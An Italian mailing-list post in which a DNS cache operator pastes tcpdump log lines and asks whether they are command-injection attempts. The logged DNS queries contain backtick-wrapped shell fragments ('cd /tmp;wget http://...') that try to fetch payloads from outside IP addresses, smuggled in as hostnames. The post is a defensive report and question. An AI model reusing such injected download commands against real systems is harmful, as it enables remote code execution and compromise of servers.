Buonasera a tutti, gestisco un server DNS cache per diverse migliaia di utenti broadband e mi ritrovo nei log delle query di questo tipo:
15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? `cd /tmp;wget http://105.226.91.155. (53) 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? `cd /tmp;wget http://105.226.91.155. (53) 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? `cd /tmp;wget http://105.226.91.155. (53) 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd /tmp;wget http://36.107.97.237:. (53) 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? `cd /tmp;wget http://84.9.195.97:27. (53) 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? `cd /tmp;wget http://2.186.193.103:. (53) 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? `cd /tmp;wget http://2.186.193.103:. (53) 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? `cd /tmp;wget http://2.186.193.103:. (53) Che cosa pensate possano essere? Tentativi di command injection? รจ la prima volta che mi capita di vedere delle query del genere. -- LORENZO MAINARDI
